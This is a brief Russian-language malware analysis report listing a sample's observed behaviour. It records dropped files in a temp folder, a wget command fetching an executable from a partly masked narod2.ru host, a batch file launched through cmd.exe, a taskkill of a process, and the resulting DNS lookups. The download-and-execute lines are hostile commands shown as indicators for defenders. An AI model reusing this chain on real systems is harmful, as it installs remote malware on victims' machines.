Техническая информация
- %TEMP%\1.tmp\11.exe
- %TEMP%\1.tmp\wget.exe http://do######spetrov.narod2.ru/11.exe
- %TEMP%\1.tmp\11.exe (загружен из сети Интернет)
- <SYSTEM32>\taskkill.exe /f /im winupd.exe
- <SYSTEM32>\ping.exe ya.ru -n 3
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\Download.bat" "
- %TEMP%\1.tmp\11.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\Download.bat
- %TEMP%\1.tmp\Download.bat
- %TEMP%\1.tmp\wget.exe
- 'do######spetrov.narod2.ru':80
- do######spetrov.narod2.ru/11.exe
- DNS ASK do######spetrov.narod2.ru
- DNS ASK ya.ru
- ClassName: '' WindowName: ''